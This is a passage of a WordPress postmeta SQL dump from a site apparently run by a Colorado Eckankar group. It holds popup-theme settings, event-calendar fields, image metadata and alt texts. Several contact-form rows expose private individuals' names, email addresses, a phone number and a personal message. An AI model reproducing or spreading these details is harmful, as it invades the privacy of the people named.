:2:\"24\";s:17:\"close_font_family\";s:5:\"Arial\";s:17:\"close_font_weight\";s:3:\"100\";s:16:\"close_font_style\";s:0:\"\";s:18:\"close_border_style\";s:5:\"solid\";s:18:\"close_border_color\";s:7:\"#ffffff\";s:18:\"close_border_width\";s:1:\"2\";s:19:\"close_border_radius\";s:2:\"26\";s:21:\"close_boxshadow_inset\";s:2:\"no\";s:26:\"close_boxshadow_horizontal\";s:1:\"0\";s:24:\"close_boxshadow_vertical\";s:1:\"0\";s:20:\"close_boxshadow_blur\";s:2:\"15\";s:22:\"close_boxshadow_spread\";s:1:\"1\";s:21:\"close_boxshadow_color\";s:7:\"#020202\";s:23:\"close_boxshadow_opacity\";s:2:\"75\";s:27:\"close_textshadow_horizontal\";s:1:\"0\";s:25:\"close_textshadow_vertical\";s:1:\"0\";s:21:\"close_textshadow_blur\";s:1:\"0\";s:22:\"close_textshadow_color\";s:7:\"#000000\";s:24:\"close_textshadow_opacity\";s:2:\"23\";s:13:\"atc_promotion\";N;s:22:\"close_position_outside\";i:0;}'),(24927,132184,'popup_theme_data_version','3'),(24928,132184,'_pum_built_in','lightbox'),(24929,132185,'popup_theme_settings','a:67:{s:24:\"overlay_background_color\";s:7:\"#000000\";s:26:\"overlay_background_opacity\";s:2:\"70\";s:17:\"container_padding\";s:2:\"28\";s:26:\"container_background_color\";s:7:\"#ffffff\";s:28:\"container_background_opacity\";s:3:\"100\";s:22:\"container_border_style\";s:4:\"none\";s:22:\"container_border_color\";s:7:\"#000000\";s:22:\"container_border_width\";s:1:\"1\";s:23:\"container_border_radius\";s:1:\"5\";s:25:\"container_boxshadow_inset\";s:2:\"no\";s:30:\"container_boxshadow_horizontal\";s:1:\"0\";s:28:\"container_boxshadow_vertical\";s:2:\"10\";s:24:\"container_boxshadow_blur\";s:2:\"25\";s:26:\"container_boxshadow_spread\";s:1:\"4\";s:25:\"container_boxshadow_color\";s:7:\"#020202\";s:27:\"container_boxshadow_opacity\";s:2:\"50\";s:16:\"title_font_color\";s:7:\"#315b7c\";s:17:\"title_line_height\";s:2:\"36\";s:15:\"title_font_size\";s:2:\"34\";s:17:\"title_font_family\";s:7:\"inherit\";s:17:\"title_font_weight\";s:3:\"100\";s:16:\"title_font_style\";s:0:\"\";s:16:\"title_text_align\";s:4:\"left\";s:27:\"title_textshadow_horizontal\";s:1:\"0\";s:25:\"title_textshadow_vertical\";s:1:\"0\";s:21:\"title_textshadow_blur\";s:1:\"0\";s:22:\"title_textshadow_color\";s:7:\"#020202\";s:24:\"title_textshadow_opacity\";s:2:\"23\";s:18:\"content_font_color\";s:7:\"#2d2d2d\";s:19:\"content_font_family\";s:7:\"inherit\";s:19:\"content_font_weight\";s:3:\"100\";s:18:\"content_font_style\";s:0:\"\";s:10:\"close_text\";s:2:\"×\";s:14:\"close_location\";s:8:\"topright\";s:18:\"close_position_top\";s:1:\"8\";s:19:\"close_position_left\";s:1:\"0\";s:21:\"close_position_bottom\";s:1:\"0\";s:20:\"close_position_right\";s:1:\"8\";s:13:\"close_padding\";s:1:\"4\";s:12:\"close_height\";s:2:\"28\";s:11:\"close_width\";s:2:\"28\";s:22:\"close_background_color\";s:7:\"#315b7c\";s:24:\"close_background_opacity\";s:3:\"100\";s:16:\"close_font_color\";s:7:\"#ffffff\";s:17:\"close_line_height\";s:2:\"20\";s:15:\"close_font_size\";s:2:\"20\";s:17:\"close_font_family\";s:15:\"Times New Roman\";s:17:\"close_font_weight\";s:3:\"100\";s:16:\"close_font_style\";s:0:\"\";s:18:\"close_border_style\";s:4:\"none\";s:18:\"close_border_color\";s:7:\"#ffffff\";s:18:\"close_border_width\";s:1:\"1\";s:19:\"close_border_radius\";s:2:\"42\";s:21:\"close_boxshadow_inset\";s:2:\"no\";s:26:\"close_boxshadow_horizontal\";s:1:\"0\";s:24:\"close_boxshadow_vertical\";s:1:\"0\";s:20:\"close_boxshadow_blur\";s:1:\"0\";s:22:\"close_boxshadow_spread\";s:1:\"0\";s:21:\"close_boxshadow_color\";s:7:\"#020202\";s:23:\"close_boxshadow_opacity\";s:2:\"23\";s:27:\"close_textshadow_horizontal\";s:1:\"0\";s:25:\"close_textshadow_vertical\";s:1:\"0\";s:21:\"close_textshadow_blur\";s:1:\"0\";s:22:\"close_textshadow_color\";s:7:\"#000000\";s:24:\"close_textshadow_opacity\";s:2:\"23\";s:13:\"atc_promotion\";N;s:22:\"close_position_outside\";i:0;}'),(24930,132185,'popup_theme_data_version','3'),(24931,132185,'_pum_built_in','enterprise-blue'),(24932,132186,'popup_theme_settings','a:67:{s:24:\"overlay_background_color\";s:7:\"#000000\";s:26:\"overlay_background_opacity\";s:2:\"75\";s:17:\"container_padding\";s:2:\"30\";s:26:\"container_background_color\";s:7:\"#ffffff\";s:28:\"container_background_opacity\";s:3:\"100\";s:22:\"container_border_style\";s:5:\"solid\";s:22:\"container_border_color\";s:7:\"#81d742\";s:22:\"container_border_width\";s:2:\"14\";s:23:\"container_border_radius\";s:2:\"80\";s:25:\"container_boxshadow_inset\";s:2:\"no\";s:30:\"container_boxshadow_horizontal\";s:1:\"0\";s:28:\"container_boxshadow_vertical\";s:1:\"0\";s:24:\"container_boxshadow_blur\";s:1:\"0\";s:26:\"container_boxshadow_spread\";s:1:\"0\";s:25:\"container_boxshadow_color\";s:7:\"#020202\";s:27:\"container_boxshadow_opacity\";s:1:\"0\";s:16:\"title_font_color\";s:7:\"#2d2d2d\";s:17:\"title_line_height\";s:2:\"36\";s:15:\"title_font_size\";s:2:\"32\";s:17:\"title_font_family\";s:10:\"Montserrat\";s:17:\"title_font_weight\";s:3:\"100\";s:16:\"title_font_style\";s:0:\"\";s:16:\"title_text_align\";s:4:\"left\";s:27:\"title_textshadow_horizontal\";s:1:\"0\";s:25:\"title_textshadow_vertical\";s:1:\"0\";s:21:\"title_textshadow_blur\";s:1:\"0\";s:22:\"title_textshadow_color\";s:7:\"#020202\";s:24:\"title_textshadow_opacity\";s:2:\"23\";s:18:\"content_font_color\";s:7:\"#2d2d2d\";s:19:\"content_font_family\";s:7:\"inherit\";s:19:\"content_font_weight\";s:3:\"100\";s:18:\"content_font_style\";s:0:\"\";s:10:\"close_text\";s:2:\"×\";s:14:\"close_location\";s:8:\"topright\";s:18:\"close_position_top\";s:3:\"-30\";s:19:\"close_position_left\";s:3:\"-30\";s:21:\"close_position_bottom\";s:1:\"0\";s:20:\"close_position_right\";s:3:\"-30\";s:13:\"close_padding\";s:1:\"0\";s:12:\"close_height\";s:1:\"0\";s:11:\"close_width\";s:1:\"0\";s:22:\"close_background_color\";s:7:\"#ffffff\";s:24:\"close_background_opacity\";s:3:\"100\";s:16:\"close_font_color\";s:7:\"#2d2d2d\";s:17:\"close_line_height\";s:2:\"28\";s:15:\"close_font_size\";s:2:\"32\";s:17:\"close_font_family\";s:15:\"Times New Roman\";s:17:\"close_font_weight\";s:3:\"100\";s:16:\"close_font_style\";s:0:\"\";s:18:\"close_border_style\";s:4:\"none\";s:18:\"close_border_color\";s:7:\"#ffffff\";s:18:\"close_border_width\";s:1:\"1\";s:19:\"close_border_radius\";s:2:\"28\";s:21:\"close_boxshadow_inset\";s:2:\"no\";s:26:\"close_boxshadow_horizontal\";s:1:\"0\";s:24:\"close_boxshadow_vertical\";s:1:\"0\";s:20:\"close_boxshadow_blur\";s:1:\"0\";s:22:\"close_boxshadow_spread\";s:1:\"0\";s:21:\"close_boxshadow_color\";s:7:\"#020202\";s:23:\"close_boxshadow_opacity\";s:2:\"23\";s:27:\"close_textshadow_horizontal\";s:1:\"0\";s:25:\"close_textshadow_vertical\";s:1:\"0\";s:21:\"close_textshadow_blur\";s:1:\"0\";s:22:\"close_textshadow_color\";s:7:\"#000000\";s:24:\"close_textshadow_opacity\";s:2:\"23\";s:13:\"atc_promotion\";N;s:22:\"close_position_outside\";i:0;}'),(24933,132186,'popup_theme_data_version','3'),(24934,132186,'_pum_built_in','hello-box'),(24935,132187,'popup_theme_settings','a:67:{s:24:\"overlay_background_color\";s:7:\"#000000\";s:26:\"overlay_background_opacity\";s:2:\"50\";s:17:\"container_padding\";s:2:\"18\";s:26:\"container_background_color\";s:7:\"#1e73be\";s:28:\"container_background_opacity\";s:3:\"100\";s:22:\"container_border_style\";s:4:\"none\";s:22:\"container_border_color\";s:7:\"#000000\";s:22:\"container_border_width\";s:1:\"1\";s:23:\"container_border_radius\";s:1:\"0\";s:25:\"container_boxshadow_inset\";s:2:\"no\";s:30:\"container_boxshadow_horizontal\";s:1:\"0\";s:28:\"container_boxshadow_vertical\";s:2:\"10\";s:24:\"container_boxshadow_blur\";s:2:\"25\";s:26:\"container_boxshadow_spread\";s:1:\"0\";s:25:\"container_boxshadow_color\";s:7:\"#020202\";s:27:\"container_boxshadow_opacity\";s:2:\"50\";s:16:\"title_font_color\";s:7:\"#ffffff\";s:17:\"title_line_height\";s:2:\"28\";s:15:\"title_font_size\";s:2:\"26\";s:17:\"title_font_family\";s:10:\"Sans-Serif\";s:17:\"title_font_weight\";s:3:\"100\";s:16:\"title_font_style\";s:0:\"\";s:16:\"title_text_align\";s:4:\"left\";s:27:\"title_textshadow_horizontal\";s:1:\"0\";s:25:\"title_textshadow_vertical\";s:1:\"0\";s:21:\"title_textshadow_blur\";s:1:\"0\";s:22:\"title_textshadow_color\";s:7:\"#020202\";s:24:\"title_textshadow_opacity\";s:2:\"23\";s:18:\"content_font_color\";s:7:\"#ffffff\";s:19:\"content_font_family\";s:7:\"inherit\";s:19:\"content_font_weight\";s:3:\"100\";s:18:\"content_font_style\";s:0:\"\";s:10:\"close_text\";s:2:\"×\";s:14:\"close_location\";s:8:\"topright\";s:18:\"close_position_top\";s:1:\"0\";s:19:\"close_position_left\";s:1:\"0\";s:21:\"close_position_bottom\";s:1:\"0\";s:20:\"close_position_right\";s:1:\"0\";s:13:\"close_padding\";s:1:\"0\";s:12:\"close_height\";s:2:\"24\";s:11:\"close_width\";s:2:\"24\";s:22:\"close_background_color\";s:7:\"#eeee22\";s:24:\"close_background_opacity\";s:3:\"100\";s:16:\"close_font_color\";s:7:\"#1e73be\";s:17:\"close_line_height\";s:2:\"24\";s:15:\"close_font_size\";s:2:\"32\";s:17:\"close_font_family\";s:15:\"Times New Roman\";s:17:\"close_font_weight\";s:3:\"100\";s:16:\"close_font_style\";s:0:\"\";s:18:\"close_border_style\";s:4:\"none\";s:18:\"close_border_color\";s:7:\"#ffffff\";s:18:\"close_border_width\";s:1:\"1\";s:19:\"close_border_radius\";s:1:\"0\";s:21:\"close_boxshadow_inset\";s:2:\"no\";s:26:\"close_boxshadow_horizontal\";s:2:\"-1\";s:24:\"close_boxshadow_vertical\";s:1:\"1\";s:20:\"close_boxshadow_blur\";s:1:\"1\";s:22:\"close_boxshadow_spread\";s:1:\"0\";s:21:\"close_boxshadow_color\";s:7:\"#020202\";s:23:\"close_boxshadow_opacity\";s:2:\"10\";s:27:\"close_textshadow_horizontal\";s:2:\"-1\";s:25:\"close_textshadow_vertical\";s:1:\"1\";s:21:\"close_textshadow_blur\";s:1:\"1\";s:22:\"close_textshadow_color\";s:7:\"#000000\";s:24:\"close_textshadow_opacity\";s:2:\"10\";s:13:\"atc_promotion\";N;s:22:\"close_position_outside\";i:0;}'),(24936,132187,'popup_theme_data_version','3'),(24937,132187,'_pum_built_in','cutting-edge'),(24938,132188,'popup_theme_settings','a:67:{s:24:\"overlay_background_color\";s:7:\"#ffffff\";s:26:\"overlay_background_opacity\";s:2:\"50\";s:17:\"container_padding\";s:2:\"18\";s:26:\"container_background_color\";s:7:\"#fffbef\";s:28:\"container_background_opacity\";s:3:\"100\";s:22:\"container_border_style\";s:6:\"outset\";s:22:\"container_border_color\";s:7:\"#dd3333\";s:22:\"container_border_width\";s:2:\"20\";s:23:\"container_border_radius\";s:1:\"0\";s:25:\"container_boxshadow_inset\";s:3:\"yes\";s:30:\"container_boxshadow_horizontal\";s:1:\"1\";s:28:\"container_boxshadow_vertical\";s:1:\"1\";s:24:\"container_boxshadow_blur\";s:1:\"3\";s:26:\"container_boxshadow_spread\";s:1:\"0\";s:25:\"container_boxshadow_color\";s:7:\"#020202\";s:27:\"container_boxshadow_opacity\";s:2:\"97\";s:16:\"title_font_color\";s:7:\"#000000\";s:17:\"title_line_height\";s:2:\"36\";s:15:\"title_font_size\";s:2:\"32\";s:17:\"title_font_family\";s:7:\"inherit\";s:17:\"title_font_weight\";s:3:\"100\";s:16:\"title_font_style\";s:0:\"\";s:16:\"title_text_align\";s:4:\"left\";s:27:\"title_textshadow_horizontal\";s:1:\"0\";s:25:\"title_textshadow_vertical\";s:1:\"0\";s:21:\"title_textshadow_blur\";s:1:\"0\";s:22:\"title_textshadow_color\";s:7:\"#020202\";s:24:\"title_textshadow_opacity\";s:2:\"23\";s:18:\"content_font_color\";s:7:\"#2d2d2d\";s:19:\"content_font_family\";s:7:\"inherit\";s:19:\"content_font_weight\";s:3:\"100\";s:18:\"content_font_style\";s:0:\"\";s:10:\"close_text\";s:2:\"×\";s:14:\"close_location\";s:8:\"topright\";s:18:\"close_position_top\";s:3:\"-20\";s:19:\"close_position_left\";s:3:\"-20\";s:21:\"close_position_bottom\";s:1:\"0\";s:20:\"close_position_right\";s:3:\"-20\";s:13:\"close_padding\";s:1:\"0\";s:12:\"close_height\";s:2:\"20\";s:11:\"close_width\";s:2:\"20\";s:22:\"close_background_color\";s:7:\"#000000\";s:24:\"close_background_opacity\";s:2:\"55\";s:16:\"close_font_color\";s:7:\"#ffffff\";s:17:\"close_line_height\";s:2:\"18\";s:15:\"close_font_size\";s:2:\"16\";s:17:\"close_font_family\";s:6:\"Tahoma\";s:17:\"close_font_weight\";s:3:\"700\";s:16:\"close_font_style\";s:0:\"\";s:18:\"close_border_style\";s:4:\"none\";s:18:\"close_border_color\";s:7:\"#ffffff\";s:18:\"close_border_width\";s:1:\"1\";s:19:\"close_border_radius\";s:1:\"0\";s:21:\"close_boxshadow_inset\";s:2:\"no\";s:26:\"close_boxshadow_horizontal\";s:1:\"0\";s:24:\"close_boxshadow_vertical\";s:1:\"0\";s:20:\"close_boxshadow_blur\";s:1:\"0\";s:22:\"close_boxshadow_spread\";s:1:\"0\";s:21:\"close_boxshadow_color\";s:7:\"#020202\";s:23:\"close_boxshadow_opacity\";s:2:\"23\";s:27:\"close_textshadow_horizontal\";s:1:\"0\";s:25:\"close_textshadow_vertical\";s:1:\"0\";s:21:\"close_textshadow_blur\";s:1:\"0\";s:22:\"close_textshadow_color\";s:7:\"#000000\";s:24:\"close_textshadow_opacity\";s:2:\"23\";s:13:\"atc_promotion\";N;s:22:\"close_position_outside\";i:0;}'),(24939,132188,'popup_theme_data_version','3'),(24940,132188,'_pum_built_in','framed-border'),(24944,132374,'data_version','3'),(24945,132374,'popup_open_count','120'),(24946,132374,'_edit_lock','1584409030:2'),(24947,132374,'_edit_last','2'),(24950,132374,'boldgrid_hide_page_title','0'),(24951,132374,'popup_title',''),(24952,132374,'popup_settings','a:37:{s:8:\"triggers\";a:1:{i:0;a:2:{s:4:\"type\";s:9:\"auto_open\";s:8:\"settings\";a:2:{s:11:\"cookie_name\";s:0:\"\";s:5:\"delay\";s:3:\"500\";}}}s:10:\"conditions\";a:1:{i:0;a:1:{i:0;a:1:{s:6:\"target\";s:13:\"is_front_page\";}}}s:8:\"theme_id\";s:6:\"132184\";s:4:\"size\";s:6:\"medium\";s:20:\"responsive_min_width\";s:2:\"0%\";s:20:\"responsive_max_width\";s:4:\"100%\";s:12:\"custom_width\";s:5:\"640px\";s:13:\"custom_height\";s:5:\"380px\";s:14:\"animation_type\";s:4:\"fade\";s:15:\"animation_speed\";s:3:\"350\";s:16:\"animation_origin\";s:10:\"center top\";s:8:\"location\";s:10:\"center top\";s:12:\"position_top\";s:3:\"100\";s:15:\"position_bottom\";s:1:\"0\";s:13:\"position_left\";s:1:\"0\";s:14:\"position_right\";s:1:\"0\";s:6:\"zindex\";s:10:\"1999999999\";s:10:\"close_text\";s:5:\"Close\";s:18:\"close_button_delay\";s:1:\"0\";s:30:\"close_on_form_submission_delay\";s:1:\"0\";s:22:\"close_on_overlay_click\";s:1:\"1\";s:18:\"close_on_esc_press\";s:1:\"1\";s:17:\"close_on_f4_press\";s:1:\"1\";s:7:\"cookies\";a:0:{}s:17:\"disable_on_mobile\";b:0;s:17:\"disable_on_tablet\";b:0;s:18:\"custom_height_auto\";b:0;s:18:\"scrollable_content\";b:0;s:21:\"position_from_trigger\";b:0;s:14:\"position_fixed\";b:0;s:16:\"overlay_disabled\";b:0;s:9:\"stackable\";b:0;s:18:\"disable_reposition\";b:0;s:24:\"close_on_form_submission\";b:0;s:19:\"disable_form_reopen\";b:0;s:21:\"disable_accessibility\";b:0;s:10:\"theme_slug\";s:8:\"lightbox\";}'),(91048,132184,'_edit_last','2'),(24953,132374,'popup_open_count_total','120'),(24954,132374,'popup_last_opened','1584550751'),(125625,263349,'_EventEndDateUTC','2021-02-21 00:00:00'),(125626,263349,'_EventDuration','3600'),(125627,263349,'_EventCurrencySymbol',''),(125628,263349,'_EventCurrencyPosition','prefix'),(125629,263349,'_EventCost',''),(125630,263349,'_EventURL',''),(125631,263349,'_EventTimezone','America/Denver'),(125632,263349,'_EventTimezoneAbbr','MST'),(125633,263349,'_dp_original','263319'),(125634,263349,'_edit_lock','1619293726:2'),(125635,263349,'_edit_last','2'),(128909,263459,'_RTEClimitRegistrations','0'),(126013,263362,'protect_children',''),(126014,263362,'_tribe_modified_fields','a:28:{s:16:\"protect_children\";i:1610630838;s:12:\"_EventOrigin\";i:1610630838;s:10:\"_edit_last\";i:1610630876;s:10:\"post_title\";i:1610630894;s:11:\"post_status\";i:1610631012;s:12:\"post_content\";i:1610631012;s:13:\"_thumbnail_id\";i:1610631012;s:26:\"_RTECregistrationsDisabled\";i:1610631012;s:17:\"_RTECdeadlineType\";i:1610631012;s:19:\"_RTECwhoCanRegister\";i:1610631012;s:23:\"_RTEClimitRegistrations\";i:1610631012;s:21:\"_RTECmaxRegistrations\";i:1610631012;s:24:\"boldgrid_hide_page_title\";i:1610631012;s:16:\"_EventRecurrence\";i:1610631012;s:17:\"_EventShowMapLink\";i:1610631012;s:13:\"_EventShowMap\";i:1610631012;s:13:\"_EventVenueID\";i:1610631012;s:15:\"_EventStartDate\";i:1610631012;s:13:\"_EventEndDate\";i:1610631012;s:18:\"_EventStartDateUTC\";i:1610631012;s:16:\"_EventEndDateUTC\";i:1610631012;s:14:\"_EventDuration\";i:1610631012;s:20:\"_EventCurrencySymbol\";i:1610631012;s:22:\"_EventCurrencyPosition\";i:1610631012;s:10:\"_EventCost\";i:1610631012;s:9:\"_EventURL\";i:1610631012;s:14:\"_EventTimezone\";i:1610631012;s:18:\"_EventTimezoneAbbr\";i:1610631012;}'),(126015,263362,'_EventOrigin','events-calendar'),(129250,263589,'_EventShowMapLink','1'),(129251,263589,'_EventShowMap','1'),(129252,263589,'_VenueShowMapLink','1'),(129253,263589,'_VenueShowMap','1'),(129254,263589,'_VenueAddress',''),(129255,263589,'_VenueCity',''),(129256,263589,'_VenueCountry',''),(129257,263589,'_VenueProvince',''),(129258,263589,'_VenueState',''),(129259,263589,'_VenueZip',''),(129260,263589,'_VenuePhone',''),(129261,263589,'_VenueURL',''),(129262,263589,'_VenueStateProvince',''),(129263,263589,'_VenueOverwriteCoords','0'),(129264,263589,'boldgrid_hide_page_title','0'),(129265,263589,'_edit_lock','1616607207:2'),(129754,263608,'_EventShowMap','1'),(129755,263608,'_EventVenueID','262507'),(129756,263608,'_EventStartDate','2021-03-15 19:00:00'),(129757,263608,'_EventEndDate','2021-03-15 20:30:00'),(129758,263608,'_EventStartDateUTC','2021-03-16 01:00:00'),(129870,263590,'_EventShowMapLink','1'),(129871,263590,'_EventShowMap','1'),(129270,263590,'_EventStartDate','2021-03-20 16:00:00'),(129271,263590,'_EventStartDateUTC','2021-03-20 22:00:00'),(129796,263610,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"2\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-19\";s:14:\"EventStartDate\";s:19:\"2021-02-16 18:00:00\";s:12:\"EventEndDate\";s:19:\"2021-02-16 19:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(129272,263590,'_EventEndDate','2021-03-20 17:00:00'),(73577,254557,'_wp_attached_file','2020/01/art-of-spiritual-dreaming.jpg'),(25214,138261,'_wp_attached_file','2019/09/harold-intro.jpg'),(25215,138261,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:124;s:6:\"height\";i:158;s:4:\"file\";s:24:\"2019/09/harold-intro.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"harold-intro-124x150.jpg\";s:5:\"width\";i:124;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:22:\"harold-intro-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:24:\"harold-intro-124x150.jpg\";s:5:\"width\";i:124;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(92291,261555,'_field_228','US'),(92289,261555,'_field_226','rhoann9@gmail.com'),(92290,261555,'_field_227','CO'),(92288,261555,'_field_225','Miller'),(92287,261555,'_field_224','Rhonda'),(92175,261533,'_wp_page_template','default'),(92176,261533,'boldgrid_hide_page_title','0'),(92177,261533,'boldgrid_in_page_containers','1'),(92178,261533,'bgseo_robots_index','index'),(92179,261533,'bgseo_robots_follow','follow'),(104036,262433,'_RTECmaxRegistrations','30'),(92184,261536,'original-file','2020/04/coeck-thanks-1-updraft-pre-smush-original.jpg'),(92185,261536,'smush-complete','1'),(92186,261536,'smush-info','The file was compressed from 127.99 KB to 125.76 KB saving 1.74 percent using WP-Optimize'),(92187,261536,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:131062;s:12:\"smushed-size\";i:128781;s:15:\"savings-percent\";d:1.74;}'),(92146,261530,'_field_286','Marc'),(92147,261530,'_field_287','Massengale'),(92148,261530,'_field_288','billybobak@yahoo.com'),(92149,261530,'_field_289','(907) 529-8977'),(92150,261530,'_field_290','Denver'),(92151,261530,'_field_293','esa-initiator-tim-kuss-denver-metro-south'),(92152,261530,'_field_294','Tim I was talking to Lee Parimuha about the herbal formulas of A. Stuart Wheelwright. He said you might be knowledgeable about these. If your are open to discussing them please call me at 907-529-8977.\nThanks,\nIn ECK,\nMarc Massengale'),(92153,261530,'_form_id','32'),(92154,261530,'_seq_num','1'),(92155,261531,'_field_224','Delores'),(92156,261531,'_field_225','Arellano'),(92157,261531,'_field_226','dtare0527@yahoo.com'),(92158,261531,'_field_227','CO'),(92159,261531,'_field_228','US'),(92160,261531,'_field_229','a:1:{i:0;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(92161,261531,'_form_id','21'),(92162,261531,'_seq_num','94'),(104037,262433,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(92164,261533,'protect_children',''),(92165,261533,'_edit_lock','1599678628:2'),(92166,261533,'_edit_last','2'),(103816,262066,'_EventHideFromUpcoming','yes'),(103878,262422,'_RTECdeadlineType','start'),(103879,262422,'_RTECwhoCanRegister','any'),(103880,262422,'_RTEClimitRegistrations','0'),(103881,262422,'_RTECmaxRegistrations','30'),(103882,262422,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(103883,262422,'_RTECnumRegistered','0'),(104078,262422,'_EventVenueID','262435'),(103886,262422,'_edit_lock','1609185816:2'),(103887,262422,'_edit_last','2'),(103888,262424,'_wp_attached_file','2020/12/kayak-to-other-worlds.jpg'),(103889,262424,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:470;s:6:\"height\";i:264;s:4:\"file\";s:33:\"2020/12/kayak-to-other-worlds.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"kayak-to-other-worlds-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"kayak-to-other-worlds-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:33:\"kayak-to-other-worlds-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(160546,266604,'mec_end_day_seconds','46800'),(160545,266604,'mec_end_time_ampm','PM'),(160544,266604,'mec_end_time_minutes','0'),(160543,266604,'mec_end_time_hour','1'),(160542,266604,'mec_end_date','2022-12-18'),(160541,266604,'mec_start_day_seconds','42300'),(192824,269146,'mec_end_time_ampm','PM'),(141902,31882,'passster_activate_global_protection',NULL),(141901,45842,'passster_activate_global_protection',NULL),(27465,198800,'_wp_attached_file','2019/10/harold-bg-tabs-A.jpg'),(27466,198800,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:155;s:6:\"height\";i:216;s:4:\"file\";s:28:\"2019/10/harold-bg-tabs-A.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"harold-bg-tabs-A-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:26:\"harold-bg-tabs-A-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:28:\"harold-bg-tabs-A-129x180.jpg\";s:5:\"width\";i:129;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:28:\"harold-bg-tabs-A-155x150.jpg\";s:5:\"width\";i:155;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25343,148680,'_wp_attachment_image_alt','ECK Master Shamus-i-Tabriz'),(25344,148681,'_wp_attachment_image_alt','ECK Master Peddar Zaskq'),(25345,148678,'_wp_attachment_image_alt','ECK Master Gopal Das'),(25346,148682,'_wp_attachment_image_alt','ECK Master Towart Managi'),(25347,148683,'_wp_attachment_image_alt','ECK Master Rebazar Tarzs'),(25348,148684,'_wp_attachment_image_alt','ECK Master Shamus-i-Tabriz'),(25349,148685,'_wp_attachment_image_alt','ECK Master Towart Managi'),(25350,148686,'_wp_attachment_image_alt','ECK Master Yaubl 